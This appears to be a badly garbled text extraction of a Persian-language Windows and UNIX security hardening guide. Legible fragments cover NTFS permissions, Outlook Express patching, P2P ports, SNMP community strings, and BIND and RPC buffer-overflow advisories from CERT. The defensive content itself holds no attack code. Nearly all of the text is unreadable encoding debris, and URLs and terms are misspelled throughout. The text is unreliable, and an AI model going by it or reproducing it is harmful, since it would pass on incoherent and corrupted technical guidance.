O*
tab 7
(,! Deny )
?# Allow
% '
Property $
?&
% ,P
% '
I
)
$
NTFS
convert drive_letter:/fs:ntfs
6" E NTFSah @ " ?
bP
\ $Pemission j*
0, 5
#
Security j *
F) ?@
)
^P
.Y
F) ?@ "
Property Y. ? 5 TG'•
< ^
Account $d
I
<
5 -,6
" ?
I - . W L3
% ' )
d*
6" E
•
& 0 K5
_000 ) 2 <
Security
$% ' ^
NTFS 0
•
-,
, #4
$ Convert ] 0 5 - Y
7 !89 S
I5
$
http//www.microsoft.com/windows2000/en/server/iis/htm/core/iidfp
sc.htm
0 5 - Y
&'( )$,% *#!51
Outlook Express, Outlook Microsoft
Outlook 7 !89
$l '
0
') #
$ 6h 5
b
$_U '@
-,< K
, ?# $ # ) #1
^P 7
0, 5
Exchange ) K
4"
K $
K6
0, <
"2
-, < K
0_
-
? &56
‰:
Outlook98 y
SL 7
P
# ) #1
0
I
5
6
BH
)
-
$ F
!" V
8Q 0, < , 6 3
C
A
0 ' ,6 3
3W 3
6%
4
H I W L3
) ?N
IE
^
- Y
F
6*
%/ -
"
6
J) 0
-
,E - Y
9
) U '@$
, ) T) ,
)
1
) < ,6 3 TP
N P ?@
6
- Y
*
?), ]
$:
, "
T#< ")
=GX
[
7
F) 7
G ) - ), .
?@ " - Y Z
")
B
5! b.
, N : <2
C
G:H
6j1 $2t5: ) 25
S
*
" - Y 0, < , 6 3 6 '&
F =GX $W 3 L !
I
$
6 &'(
SL ?# _ c
$l ' # )
3
$
) rendenring 0, 5
6 )
H ? 5F
*
?@ - 56
, 1
6 '$( '784 2
, G 7c L.
!
]
56${Š "), ) 'G ? " " ]
' ) #
Outlook 98
IE - Y a? `56 P
Q
4 -, 6 U )
=! > ?@
SL
? !
4 " HTML
2
-)8!
Server
V < ? " $7 H8
IE
-
Yc j*
5 ? !
) L*<
1
) 7 ,3 K
Backoffice „ 1 # " - Y ? # $"), ) % !
$
U)
*]
6
c L. n YBIE ) OE
I
4 -,
5/ 0
)
Express Outlook ] _OE
Outlook K
! 5E "
? " ) 6 1G'Oulook
"
4 l),
F
# ) #1
bP
b
2,
5 $
6 &'(
4
6 '&
$_ ' ) #
("c 78
%
,
- 4$ ') #
BH
M ,6 "
# 0 < ,6 3 T
# ) #1 6
) 7 !89
,
,
\X
2 )-
$ # ) #1 6
0,<
< TP
O *
&'(
P
6h) )
"
6@
I
n 9 " Help
l'
f4 "
Outlook ? !
Z
0
,
:3 ) 7 , , ")
# ) #1 6
-,
"
*
2K4
0 ' 6 @
6*
6N F e 'j 4 SL ] 0
,G
- 5< " ?
?) ' 6 BH
3"
$IE )
F " U4 $IE TG' $
>! ? !
) ,< ,6 * SL
Outlooka
U)
l ' &'(
6
K U '@-
$?@ SL W L 3
_
-,< K
"), )OE
0
B '8
0, < -
6T
/ "
5 - 56 -,< K
& ? 5 About
, ,F *
-,< E
0 1 !"
6*
*
G
6, ) 6(
+. /
OE
e
)
!89
6)
$
,
$
,F
)
7
5L
6*
Outlook9 •
Outlook97 •
_ <
Y & Outlook9 ?@
] Outlook 2000 •
) Outlook10 ?@
] OutlookXP •
Y & Outlook2002
_ <
& ? 5 TG' About
*
- 5< " ? OE 2K4
!
pqqq "
a 5 - Y
n 9 " Help
"
6*
Patch +
0 ' 6@$
" ?
!89
-http//www.microsoft.com/windows/oe/.
-http//www.microsoft.com/office/ outlook./
!"
0 &'( )3 45 678
F " U4 ] IE
:
)
2
_
-,< SL
0,
(N )
) SL "), ) % !
6
?@ - 56
Outlook Express
" * IE
$U '@ 6
SL
*
"
,6 3
,<
! 5E SL
" - Y
( ,H ? Outlook -, < K
( N (,! 7
0, <
H, , e G
?@ )
K6
0
-,< SL &
0 < ,6 3
HS @e G
0 5 OE )Outlook
6*
3W 3
$ 9
5
%K
75 I
& A
! (,!
#
) -,< SL
0 <
&'( )$,%
%
"2
a
(E
F 7 , , j6 ) l ' R4 S @ %
DY/ I 5
YB* 7 B
5!
*# Outlook
0
6
"
Outlokk Express
e 'j 4 7 5 I ) SL Outlook ) Outlook Express
7 5 I W L3
4
9:; 678
("c
W L3 2
0,
:
2
0
=GX
2t
5: -,< SL
*
?
(N " ) (E
a
SL ) http//windowsupdate.microsoft.com/
. ] Critecal C L 3 -,< K
_
n 9 " Layout
0
6
,
& O*
0_Preview]
6 'Show Preview Pene
bP
" 5
Security Zone]
) O * Options
& ? 5 TG' g
n 9"
a,<
:
I
" View
5#.
2
•
0 # ) #1
High I
Ae 7 )
$7 !89 "
6
5
1
) % 4 ? 5 T G' g •
0 < '
D
6Patch
/ 7 5I ? 5
& Tools
- Y •
) A" @
) X?
25 , @ ' ^ P
,
# ) #1 6
"
•0
% !
" - Y
K ?@
j
:
("c
?
F
$, < 2t5: ?@ -,
T
+P
6h) ) W L3
/ $ 5 5X % '
("c
'
•
? "
$?@ ? 5 TG'" %P
H) ,
0 <( E
"
g ] , 1'
? !
? ,
6h) ) "
6% '
"
("c $ 5 5 X % '
" ,G b
'
5 5X
'
$l 'h @ ] 0 5 - 3•_MY Documents
6% 'S
#Y ]
5 O*
N
_
("c 0 <
3
# ) #1
XSL
% <,
0,6
' ) #
" - Y
macro Disable
I
6% ' /
'
F
# 2
,<
% '
*
6,
•
("c #
High ,
&
)
- <
HS @),, e G
7c L.
:
6% '? 5 T G'" •
- 56 5 5 X
) DOC
•
? "
$_Word
I]
TG'
0 < '
c
?!)
6
!89
DY/ W L3
6
0, 5
DY/ " ? 59
"
K $O *
(N
(N 7 B
5! $h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
)
6
-,6
# ) #1 6
? ,
?"
h)
h @" ?
6
U)
$O * Π#
)
@
6
NY67
6
)
(E
5 j 4)
@
) 6h) ) "
) 5 5X
@
7 L
6
" - Y " %P
H h) )
,
Q%
Q $7 , , 2 , ,F %
0, 6
)-
6 &'(
L %H , / 6h) )
, , " %P
H $Π#
n 9 " 6(
@
) 6h) ) $ 6(
6
I5 -
? @b
7 # $h) )
6,
I 5 0,
BH
$
P
DY/ 6 & $
" ,G 0,
6% '7 L
+F
)O * , % <
(N
# ) #1Preview $
I 5 0,
$ '
http://www.microsoft.com/security/protect/antivirus.asp0 5 - Y
A
) #
UW +Outlook
0
Express OutlookK
Outlook Express j &'M,6 ]
$l '
*
"
2 3@ '
I 5 0_ c
g] , 1'
?@ ,
? G 6h) ) "
"
/ )
N
6% '
'
7 G',
'
3
2
_
O*
6% 'S
#Y]
F
\) < :
5 O*
N
) DOC
0,6
' ) #
macro Disable
)
6% ' /
0
- <
" - Y
'
,<
% '
*
6,
•
("c #
High ,
&
F
# 2
HS @),, e G
7c L.
<
- 56 5 5 X % '? 5 T G'" •
# ) #1
XSL
% <,
•
? "
0_
("c 0 <
9
l 'h @] 0 5 - 3•My Documents
,G b
5 5X
3 ?1
5 ) 6 BH
("c 5 X % '
, 1'?
"
'Z
_Word
I]
T G'
0 < '
c
6
DY/ W L3
!89
6
, 5
(N
(N 7 B
5! h) )
@ ' 4
h) )
@ ' 4 ) , ,F
6% '? 5 V8 " ? 59
4 0, <
$
)
-,6
6,
I 5 0,
BH
6
# h) )
K $O *
DY/ " ? 59
"
P
? @b
U)
? "
$O *
@
6
6
# ) #1 6
? ,
h) )
I
#
+F
,
?!)
6 &'(
) 6h) ) $ 6(
NY67
6
6
)
(E
6
) 6h) ) "
I
7 L
5 j 4)
, , " %PH $
) 55X
@
Q 7 , , 2 , ,F %
0, 6
)-
Q%
L %H , / 6h) )
" - Y " %P
H h) )
n 9 " 6(
@
I
#
@
)O * , % <
DY/ 6 & 0
" ,G 0,
6% '7
0,
A
L
(N
# ) #1
$Preview
.
http://www.microsoft.com/security h @ " ?
$ ' ) #
0 5 - Y /protect/antivirvirus.asp
Outlook Express
M, 6 ]
'Z
" ?
7 G',
$l '
" ? 59
*
'
I 5 0_ c
U '@ 6
)d *
7 L l'
.
7 K
&F "
6 @
I
XP Security h @ " ?
#
7
u
) Outlook ?
4
(N
5
("c 0 5 - Y white paper Office
# 2
$,<
#P<
? , 0 < -,
" Outlook
) X ) ("c "
bP 7 5 I )
6T5! " %P
H
I5 ,
( N6
0 5 - Y Offece Product
0, 5
$XP U '@ *
- <
)
5 ) 6 BH j &'
http://www.microsoft.com/windows/oe h @
I5 0 5 - Y
Updates page h @ " ?
^
UW +
9 Outlook Express
3 ?1
2 3@
Outlook 0
"
* 5<
, \89
# ) #1 6
"
( N6
^
\X
$
7 K
&F
<@
0, 5 - Y Resource Kit Office
Outlook Express
U)
6
)
# ) #1 6
? 5 Uninstall
I
N W 3
( ,H ?
$
?
"), )
6*
)
0 5
?
ME
Setup
- Y 7 !89
, -,
•
Outlook SL 7
? 5 Add/Remove Program
•
Outlook ExpressSL 7
) {† "), ) )
O * ) Windows
" #
) " Outlook Express ) Outlook
a 5
& " - Y
Outlook D 7# Uninstall
& ) Add/Remove
Progtam ? # @ O *
0 5 6 ' ?@ MR/ ?# Outlook Express
?
XP
a 5 - Y
•
Outlook Express SL 7
) pqqq "), ) )
"
6h @ " 9
7 B
5!
, `4
F
Outlook Express Version 5. X/6.0 *
h @" ,
- Y
,
"
pqqq "), ) ?
5
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq263837
0, 5
Outlook Express Version 5.x/6.0 *
h @" ,
- Y
$,
"
ME
5
) {† "), ) ?
…
- Y
http://support.microsoft.com/default.aspx?scid=kbEN-Usq256219
0, 5
R4 S @ : 2 5
Wimdows Peer to Peer File Sharing (P2P)
6 ' ?# 2 ) 0, < '
User mode
I
" ,
H- Y
' $ K, )
" ]-
2
l' 6
h
-,
"
- 3• >'
I
4 -,
? G? ,
6-
I
N
6 #P<
" % ' '
? ,
)
SB
g
-,< K 7 < &
?
" ) +"
0, 5
)
6'
)d*
<
3
)V#
$ 6% 'V <
2,
U)
? N - Y
Q
" - Y
H? ,
I5 l ' 6
code Source
Napster b
6
9P T
" \ 2
- Y _
/) 6
, 5
6
2 H
U)
6
+" ) Download
)Y \
5
<2
I
3 ?1
7 L SB
g l'
6 "
I
!
B
B
512
U)
?#
1
&5
) ,<
d
l ' R4 S @ :
6
n 9 " -, < 1P
0, 5
(
7) Y -,< - <
^ P ) -,
0
E
F
6-
E F
U)
I
&'
6% '
,
)-
?
0, R V <
6% 'T
)?@
download 2 ,
7
5
„ 1# 2
LAN
,63
L ?
6
F
1
), 5
)
5 0 5
' $ 6% 'T
F) & WAN
6
H ,F , , ) S @ e G
(E
U)
'/ < \
N 7 4" - Y
K
-
1%
I
l'
\P
< ?# W 3
6
P2P
) (E
6% < ,
67 4 " X /
I5
?@
http wrappers " - Y
" - Y
) E F ^P
0,<
( ,H ? " ?56
- Y e 'j 4
I
), . ("c 78
I ^P , @ '
<] -,
I
0 ' , 6 3 -,
6 #P<
0 < ,6 3
% < I
_-,
Q 0, <
)
6
'
E F 0, 5 upload 2 ,
l ' 6
-, < T 5!
3
? &56 : ,
. 2'
T/
v 4 6
6
? "
i:
multithread
/ ) j &'
" - Y ? "
5
"E
g
DOS \ "
85/ ;! ,
) _P2P -,
U)
7 !89 23 , - 9 *
F) 0 <
<R V <
,F :
<
_… )
F) & ^
6 &'(
$
\X
]
L $
2
,
#4
:
_
% < P2P
$ " ]&
B'\
l '7 , , 0 '
=GX % 1
, ] #P<
),.
H %K
N` 6]
:
2
0
] 7c L. -, 6 K
6
n 9 " -,< K
6
\ 2 " ? ,
.
6
_
,
<b
.
TP
- Y )_
) B'
0, 5 F
+. /
% !
_0
F
6*
5
-, < < "), ) )
F) & U
1) U#
^P
SL
% !
6
,G
^
0, <
3 W 3 j1 #P
< )
P2P
a
" \ 2 b
-, < - Y T) ,
6
5 - Y "), )
6*
:
2
P
1
& ?@) <
0 &'( )3 5 678
6
" - Y d *
4
4 )
"
6* ]
,, 2 e G
!"
,6 3 TP,
P2P
?
I5
0 1 !"
"
:
#P<
' y
2
<
•
6
6
b
C 5!
application layer strings
'
E F•
- Y P2P
0
-, < download
. T
I
#P< "
- 3• 6? #
_exe, mp3, wma, avi, mpg, mpeg, jpg, gif, zip
0
"@
'D
j6
#P
< "
(E
)Y 7 B
5!
6% ']
- 3•Z>'y
&'( )$,%
$l ' R 4 S @ : %
%
•
b
•
9:; 678
DY/ I 5
a
? "
? H ) dowmloading
6
^P
|
<
" - Y •
T G
? "
? "
g
6
" - Y - .
.
#P<
6- N
^P
" - Y •
T G
) #P< "
•
- 3• >' 5
0" E
$@R=
6 &'(
C L3 &'(
SL
H
5
8
•
15G ?
0, < P2P
T
P2P
6
b
I
) 4 -, 6 U )
" - Y •
-,< - Y
67 4 _ ) ) | F) 3] y
P2P
^P
'
0-,< ( N h) )
2P2P 0 1$
B'•
•
C L3 #P
<y
@
6 &'(
"
` 7 6= 6 :!
") - Y •
! 0 1G 7'
_••{{ $††}Š $†††† - 5< TCP
67 4] Napsster
•
_‹••Š $‹••p $‹••w - 5< TCP
67 4] edonkey
•
•s‹} $•s‹• $•s‹Š - 5< TCP/ UDP
67 4] Gnutella
•
6- 5 < TCP 7 4]Kazza
•
TCP/ UDP 7
4 ) www
wp‹w - 5<
&'( )$,% * #1
Simple Network Management Protocl
(SNMP)
-N
5
SNMP " - Y
784 2
) ,
, #4) ) - " y
#4
I 5 ?@ "
#
SB
g
$T
0 <
1
)$
I 5 SNMP %# ) 4 "
- Y TCP/IP
- Y
P ' 4
#P
< 7) Y
6
6( '
-
) 6Access point $ 6ˆ K $ 6 ) $ N4
'
0 <
SNMP
,
6( 4
^
6N
3
2 ( 4TP
B %
,
6- N
$SNMP
-, < - Y
b
o
F
&
$
SNMP
N& S
^P
%
< 0_, 5
- Y
] #P<
)
3
$l '7 !89 " - Y
Q 0, <
R4 S @ ^
?
5 SNMP
u
- 5< *
$SNMP
0_, *
L3 7
L
_U )
3
,K
B!
" ,G b
R4 S @ ^
< $h
_?@
/
X !
6-
' )
!89
-,< %L
3 M,6nH ) S
-,< K
6v
6( 4 , K
"
$SNMP
*
I5
j ,4
]
< TP,
P
"
- Y
6N
6N
O*
H
e 'j 4 7 L ? ,
6T, " - Y
- 5< *
#4
PG ) , K
R4 S @ ^
3
, G ) T G' SNMP
,G
" $SNMP ) )
,1 "
I5
7 K
&F
SNMP
6( 4 "
<
0, <
R4 S @
^
, ) ,
) 7 !89 Z ',
2 5F
)
H $l ' R 4 S @ ^
- Y SNMP
3 785/ &
c L. $ N
#4?
bP
R4 S @ ^
6*
5 i: j &' I 5 ? ,
6N
SNMP
6A) " - Y (,! 0, 5
! N " $
#P
<
A) " [
P e 'j 4 A N 0,<
6
0, <
3
gV
"
PG ) , K (& # ) -,< 1P
^ P
SNMP 5 , H
? G -, < &
<
) 6
3
7 & E ) 7c@ 2<
]
V
^
- Y
6A)
6( 4
6A) " [
0_78#
,
6A) 0, 5
-, < - Y
,
6A) " $SNMP
)Y
" ] DOS \ " 7) Y 785/ ( E
? '
0, <
I5
$qs …pqqp CERT – h @
R4 S @ ^ 0 5 -,6
0
6N
! B
5F " $ 6( 4 "
* ] SNMP
- 5 _
- Y $ #P< y
I 5 -,< - Y
:
I K 6N
H
, 5
6T, " - Y
6A) W L3
,1
K
]0, <
("c ,
U)
? G SB
g )0
2#5
#P<
, 7c .
A)
SNMP0, <
Point
6- N
U
1) U#
-, < d *
0
3
$UPS
6N
^
)
$ 6 N4
,
7) Y
/f
=GX % 1
,
:
9P
Bridges ) access
% !
P 785/ &1@ " %
#4
B5#
I 5 -, < - Y
SB
g SNMP " 0
#P< 7 & E $ )
SNMP ,
, b
) Windows Service (&B
SL
6*
$SNMP
6
SL $ #P
< )
6
7) Y
embedded
e 'j 4 7 L $SNMP
5 TG'"), )
F
2
6*
0 <
- Y
785/ Q
0
+. /
* SL
Q 0, <
-
&
- 5 "), ) % !
0 1 !"
6*
5 T G') SL e 'j 4 7 L l 'U )
SNMP
l ' R4 S @ :
P
5 CP
0, -,< K W L*
#P
<% !
6
0 < ,6 3
!"
$ #P<
-, < % L
)
F
5 $SNScan N 4
6N
)
0 5 - Y
. Foundstone. http://www h @ n 9 "
" - Y
? #
#
0
SNMPZ F ) SL W L3
GF
?
^
% !
T G'd *
-,6
)
" - Y
SL )
"b
5
SNMP SL
I5
A)
" ?
) #5
?
?
<"
67
# n.7
a < ,6 3
-
"2
Com/knowledge/free_tools.html
'
$
2
netstat
w•p ) w•w
)
0 &'( )3 45 678
I 5 ("c 7 B
5! $SNMP "
b3
) 6- N
H,, e G
?@ ?
("c
7,
U#
,
0
KF
0
(E
( E
2
6&
7 L
- 4- ."
)- @\X
4 )
F) N 4
6 @ " U4
(E
6U )
SNMP
E F)
7 B
5! 2 netstat-an
H,, )S @e G
$SNMP
-, < - Y
) e 'j 4 SNMP Community
] 13
F)
_ P
!
h,/ % H SNMP Community
F)
Community SNMP Y*
F)
6 <
&'( )$,%
DY/ 7 ,H ?
0 5
")
%
9:; 678
$l ' R4 S @ : %
DY/ I 5
6, "
26 A + D
( )0 1
I 5 $SNMPv3
) 6( 4 , K
7<
%
P
T,
" - Y
_?# 7
Patch *
2 3@
?
$? ,
$)
)
, 1 7 L*
"
w•w 7
,
4] , K5
0
K6
),.
agnt b
^
b
agnt
6@
B' #P
<
(E
6
% !
SL $-,
) )
P $
)
6-
,1 b
3
,
? &
P
A R 4 W L3
T
("c T
P
!89
y
SNMP
3
3
6N
"
?
6*
B'T) ' " - Y 0
? 5 V8
w•p 7 4 )
2#5 l ' J) 0
$?@ " ,G ) pqqq"), )
6
9
F) F 3 7 L
l '7 B
5! ?
6
-,< K
SNMP
B
SNMP agnt b
6
6
N&
SNMP " - Y 7
*
l '7 B
5! 0_TCP/UDP
) X #
- Y SNMP agnt
] 6-
$CERT Advisory CA-2002-03 5 5X j*
0 5 GF
TCP/UDP
9:;
SNMP ? 5 TG' g
?@ " - Y 7 ) X (,! 7
[
6& ? G
?
1
) $,<
Q
0
(E
( E IPSEC
& ?&
B'
)
0 < +H )
c ;
?@ " - Y 7 ) X (,! 7
0 1$!=
%
9:;
SNMP ? 5 TG' g
I 5 $SNMPv3
) 6( 4 , K
P
T,
" - Y
_?# 7
W 3
"
2
0
)
) 7
$)
)
*
SNMP " - Y 7
P!
L )-
h,/ % H
g
,
O*
0, < )" @
W L3
3" ?
N&
6& ? G -, < - Y ] community
- Y _
( #.
] 6-
("c
:
2
0
I5
N
u&
("c
"W 3
P
F 7 # " - Y
(E
P
!
6&
$http://www.sans.org/resources/idfaq/snmp.php h @
6 ),.
-,< '
-, <
K
0
b)
w•w 7
B' #P<
) )
6-
l '7 B
5! 0_TCP/UDP
#
#40
4], K5
(E
$-, < & 5
$
,
F) F 3 7
6subnet 2 SNMP " E
'
B
I
&
- Y
SNMP
9
w•p 7
4 ) TCP/UDP
L
6N
,
I5 C
'
) X
y # B' ,
0, 6 ( E
U
M f7 -
!"
R4 S @ ^
2
U
1) U#
$ %
!"
1
23
4 0, <P
7 !89 "
)
0
)
%K
25
:
-, < =! > ?@
56 $
5B
!C
8
? ,
)
5L M 9
A
'D
(E
! 5E 2'
/)
F
&1@
6 GH )
5 2'
H? "
?@
P 4)
"
R4 S @ ^
3W 3 P
B
9
F) % 1
,
' ?5F
) - 5 - Y -,< 3 <
$
3 M ,6
%
,
, N ?#
-
) 6? "
& 5
?5F
^ 2
"
S @^
N &1@ )
S
6@, 5
D Y/ c
) [
3_
O * 7
<
\
R4 S @ ^
) 6 Y/]
) X
F 78#
" V,
,G
6A)
2
,
,3
%K " 6
O * M,6? G
Cod Red )
% !
7 !89
? @ > GP
8 $
B I
6
?
Q
6U )
6 &
$ ?5F
0, 5
) 6(
I
RN6 2
#P
<
E )
6
" - Y Z
I
N
) !
Y 785/
T) , % !
=GX ^
N` 6?), ) - # M 9
(
&@
I
J
0
,G
6
-
6
O*
I
56$ % !
-")
P % !
: ),
F 7, ,
, - .
6; . " -
"
M 9" ) , < % !
@)
&' * +
# $% !
6
R4 S @
<
b
R4
0, <
) U#
R4 S @ ^
F) B
!$
)
2
R4 S @ ^
R4 S @ d *
N 560
"
,< ,6 3 K
6 'G " U4
2
<) , , e G
% !
$ R4 S @ ^
"
6%
c
3
6
! 5E
4 63U
$
1
=GX
N 4) B - .
% !
6
R4 S @ ^
-, " )
<@ ? @
^
&1@ )
!
? "
F) " [
< )@
785/ ) 7 , , SB
g $,
6 '?5F
#P
<)
F
? ,
"
)
4 ,
1)
$
- < ?@
R4 S @ ^
"
% !
6 S
0
3
=GX
I
bP
-
? F i:
0, 6 ( E
)
- <
("c 7 ,H )
6
F
R4 S @ ^
("c
6%5G1
% <
B5# ) , Y 7 !89
6
M @ 7 &'( )Q% *
- Y
G )
i:
"
-
\
785/
F
-, 5! -)
-
-")
K6
F
-
? F
2 5F
, 5
- Y % !
U#
R4 S @ ^
b
f
% !
"
, G 785/ ?
? G _7) Y
2
?
+
# $U#
0
6 * ] U#
$ -,< ( E -
)
a- 5
BIND Domain Name System
Remote Procedure Calls (RPC)
Apache Web Server
Generl UNIK Authentication Accounts with No passwork or weak
passworde
Clear Text Sevices
Sendmail
Simple Network Mangement Protocol (SNMP)
Secure Shell (SSH)
Miscon figuration of Enterprise Services NIS/NFS
Open Secure Sockets Layer (SSL)
BIND Domain Name System
)
-
$ (Berkeley Internet Name Domain) BIND &'(
h
- Y DNS_Domain Name ] "
BIND 0
/ 5
IP h @
_http://www.srco.ir/ a
#P
<
\ " C L3 $ 785/ ( E
( E ?@
I5 S
^P
1
) $, -
- 4 #
(E
? ,6U)
M,6
0, <
R4 S @ ^
) -,
,
!"
#4
DNS T# < ")
BIND
K6
j
CA- CERT
785/ N " , 5
dOS \
K
:
l 'F
6v 4 T
"
0
H ?@
-,
) - Y DNS
;!
BIND -, 6 U )
Dos \ " F
>/ 0, <
R4 S @
,G %
Z
#4)
W
ZF
$ Dos \ " F
B
5F " 0,<
" F
!
L3
) X
",
Cache
< TP,
^
-, < =
7 K
&F Advisory2002-15
H
Overflow \ "
3
:
Resolver +
^
")
<
"
- 4
F ) DNS
3
2
$ 3
7 K
&F
",
F) :
5F
2
6 ' l ' R 4 S @ : " - Y Z ?# $ - *1 ,
,, 0
5
" ,G " 6
N ")
2
0,6
<R "
R4 S @ ^
,
CA -2002 -19 CERT Advisory 1 0
" F
$
" $l '785/
K6
3 #
1 0
E
? & ) 9
785/
5 $ 6% 'S
:
? '
I5 ?
, $ 5 ,H
) Buffer Overflow
=GX
?@ ?5F
< TP, ,
L Bind deamon ? @ )
l '%
?@ "
- Y -,<
? G
? 5 M 9
? , ("c 6 @ (, ! a,
*
0
(, ! ) DNS U )
<8 BIND ? ,
)-
F
I5
785/ ) O * _Dos] Denila of Service
!
6U )
g7
% ,P I
/ - N F ) BIND " - Y
?@
0, -
I] ? &
- 4
,
R4 S @
O *
/)
N
?@ " ) - Y l ' GX) " ? 5F
- Y
@
,
6
6 @ ?), )
1G' I 5
2
3 PG
g
0
#P<
6-
'784 ? G -, 6 U )
F
" ?5F
0
R4 S @
- 5 U
2 , 0, 5
-
3O *
,6 3
BIND "
SL ?@ )
*
1) U#
Ž6, 6 U )
1
&
S
2 +. /
, -, < K BIND " *
#
0 1 !"
6
5 C
P
? G? &
,
#47
0,< ,6 3
!"
)
) K % !
BIND "
- 5
6Patch 2 3@ " - Y
K
? 59 BIND *
?@ "
" - Y 7
5 %
S @ T5 / $,< -,
Patch %
, 6 3 j 5 X.Y.Z 7
Level Patch
)
?@ )
"
?@ ?
)-
, N
2 3@ "
H
0
Symantes
-,< ( N
N 4
- Y & $
*
I
" ?
R4 S @ ^
d *
$
4
"
BIND
bP
-,<
F)
R4
Y$ B
-,6 X
*
N
4
2 3@ 0 5 SL
#
5
'
2
ISC
>! $ BIND
6-)
0
I 5 DNS
R4 S @ ^
*
2 3@ $
6, 6
6
&'( )$,%
a
)
W L3
F
P
3
/
-,< SL BIND *
7 K
&F -, 6,
6 #) "
-,<
0 5 %
0 < ,6 3
Version 9.2.2 v
6 @
,1 b
2 3@ SL "
-, < K BIND *
N
-,< SL
X !] -,
5 ,H
)
Z) *
ISCb
bP
$
Q
L
-, 6,
'
)-
6
7
BIND #
^
:
?
(N
/ ? 59 BIND *
("c 7 !89 v named a
0
3 *
( E _-,
gInternet Sofward Consortium :ISC
SL BIND #
0 &'( )3 45 678
%
%
nH
9:; 678
DY/ I 5
)
•
l89 & named ?@ ] BIND deamon ? 5 TG' g
_
N 4
I 5 0, -,
BIND &'(
'
?
DNS -, 6 U )
I
? G
_?@ ,E ? 5 TG' I ] W 3 7
K6
u 3
0 5 MR/ 6
)? ,
,1 b
6Patch -, 6 U )
-,< K
B5# 7 !89
'
0, 6 Z
Checklist j* ) CERT
"
*
N
(N
2 3@
" BIND
-,< K 7c
T5! "
) "
•
I5
?@ ?# 7
2t
5: SL
:
0, K5 - Y $ UNIX Security
Banner
^
g *
j 4
)
785/ ? 5
BIND GH ) *
- 5<
-, ` 4
) MR/ BIND "
•
I5
Version String
0, K5 2 &N F _ named DNS servers) % '
DNS
[? , 6U)
Zone 7c
Zone 7c
C
'
T
GH )
•
?#
? # _secondary DNS servers], K5 6 'Domain
^P
Child ) Parent
^ P
? # " %
) T G'
g
0, K5 - Y _Forwading] y
#B
5! %
DY/
6 Domaion
R )] Delegation
) ') _ 1t
•
glue fetching ) Recursion ? #
I5
0, K5 TG' g DNS Cache i .
5 ?
H
. ) named" " - Y
[
non – privilage
:
? G BIND 2
Privilage h @ " BIND 9 - 5 < *
DY/
, K5 ),.
•
I5
BIND $
Z F Chroot
0
0, K5 - Y http://www.losurs.org/docs/howto/Chroot-BIND.html h @
BIND -, < =
R4 S @ ^
bP )
3 785/ %
DY/ I
a 5 - Y
h @ " ISC
BIND
0
h @ " ISC
0
:
Dos
R 4S
@
" ?
:
•
- Y http//www.cert.org/advisories/CA-2002-15.html
BIND
- Y
9
"+
8
:
DoS
R4S
@
: 2,
http://www.isc.org/products/BIND/bind-security.html
•
6
)
BIND
25 SL
I 5 ("c 7
4" - Y ) 6@
) Running the BIND 9 DNS Server Securely a h @ " ?
0 5 - Y Afentis h @
$U c
-,< K 7c
<@
Remot Procedure Calls
(RPC)
K62 )
F
H
B
5! - N F
F
0, <
U)
( E
K
I
" )-
T
n 9 " ()
?@ " - Y RPC
- Y NIS ) NFS % 'V < $ ) - "
,
I #P
< -,< +"
6
; G RPC
,G
6=GX
F)
6U )
Q
RP @
? 5F
RPC
6" E
6
" - Y
T % ) ) 1999 T
RPC
,G
RPC " - Y
6
T) ,
I
?@ "
f
F
)-
T 5G ,/ " j
0,
)
H"E
@
=GX
S
DoS \ " 785/ Q
R4 S @ : )
: %1
, $ #
g F
I
F) & C 3 0
0,
i:
& @
' )-
y
6,
-,< =
-
\ ' 7 ")
785/ 8Q
RPC
6U )
RPC DCOM
;! "), )
?@ )
U
R4 S @
^
2 +. /
-,< SL RPC
F
2000
^P
:
#
ZF
3 M ,6
K6
-
(
2, ,
0, < , 6 3
=GX
6
-,< YB* 785/
0 1 !"
1
) U#
6*
5
0, < P , , e G
!"
"
# Z F" ?
$ rpcinfo"
a,
RPC
Program
)
- @
R4 S @ ^
)
&'( )3 45 678
N 4
" - Y
RPC T) ,
6U )
RPC SERNIS
Number
100083
Rpc. Ttdbserverd
P!
Rpc . cmsd
100024
Rpc.statd
100005
Rpc.mountd
100232
sadmind
100235
Cachefsd
100249
Snmp Xdmid
buffer Overflow 785/ n 9 " C 5! RPC
H- Y Z
6-
100068
) 6:3 W L3
' ) ("c
? # 2 $ Buffer overflow
R4 S @ ^
_O * , 7 L SB
g]
j4% H
) Z:3
:
, <P -, "
b
RPC
, 5
F
, 5 T
6U )
l ' R4 S @ ^
"
" ,G #
" & @
0, 5
- Y
4
) X
RPC
"
6U )
"
K6U )
:
I'/ ?)
1
-
$-
.
, 5
"
Z F T 5G ,/ " j
g
6
?# ,
%
P%
9:; 678
DY/ I 5
•
6MR/ ) ? 5 TG' g
0,<
F) ? @ MR/ ?#
$
Z F% !
) - " )"E
RPC
) )
6 'F
F
&'( )$,%
a
B
! 0,
b
' F
' - Y ,
6'
2
6
, B ) h / K6?#
O * , Overflow & @
1
" E
RPC
g-
F =GX
4 - Y
( E ,!
6U )
5 #P
< )
?@ "
•
-,< K Patch 2 3@ SL
a
0
- Y _http://sunsolve.sun.com ] h @ " U c
http://www.ibm.com/support/us
0
a h @ " IBM
,
&'(
AIX
- Y http://techsupport.services.ibm.com/server/fixes)
) http://www.redhat.com/support/errata a h @" U
0
7
L
http://www.debian.org./security
- Y
Patch 2 3@ SL ) 6 @
9
1
I5 E F7 B
5!
0 <( E 5
135 7
4 ) RPC
portmapper
0, 5 V8 T) ' )
UDP ) TCP
, K5 V8
$ l ' J) "
785/
5 %
785/ "
3
B
^
32789, 32770 Loopback
6
DY/
windows
) i:
^
B!
_ UDP ) TCP] 111 7
^
)
F
c $ KF
F
[
g
B! ,
g
4
5
4
4
_UDP ) TCP]
67 4
? 5 TG'
" - Y 0, 5
5/
1
) - PBuffer overflows
0
TP
" %/
NFS % ' 6
$
,
^P
a
6
P IP/ ? & " - Y
1
, 3 b'7 L
R4 S @ ^
- Y
"
6h @ " ?
RPC ^
% ' 6
j 4
:
,
#4
nfsbug" " - Y
B5# 7 !89 R 3
a 5
http://www.cert.org/advisories/CA-2000-17.html|http://www.cert.org/advisories/CA-1999-05.html
http://www.cert.org/advisories/CA-1997-26.html
http://www.cert.org/advisories/CA-2002-26.html
http://www.cert.org/advisories/CA-2002-20.html
http://www.cert.org/advisories/CA-2001-27.html
http://www.cert.org/advisories/CA-2002-25.html
http://www.cert.org/advisories/CA-1999-08.html
http://www.cert.org/advisories/CA-2002-11.html
http://www.cert.org/advisories/CA-1999-16.html
